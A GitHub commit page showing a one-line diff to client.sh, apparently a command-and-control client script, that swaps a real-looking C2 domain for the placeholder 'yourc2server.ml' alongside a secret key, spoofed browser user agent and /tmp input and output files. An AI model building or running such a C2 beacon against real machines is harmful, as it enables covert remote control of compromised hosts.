Skip to content

Commit

Permalink
fix example
Browse files Browse the repository at this point in the history
  • Loading branch information
mthbernardes committed Dec 2, 2018
1 parent 5c1d5d6 commit c2e3984
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion client.sh
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@ fi
running=true
secretkey="$1"
user_agent="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"
c2server="http://www.dedonocuegritaria.ml/?key=$secretkey"
c2server="http://www.yourc2server.ml/?key=$secretkey"
result=""
input="/tmp/input"
output="/tmp/output"
Expand Down

0 comments on commit c2e3984

Please sign in to comment.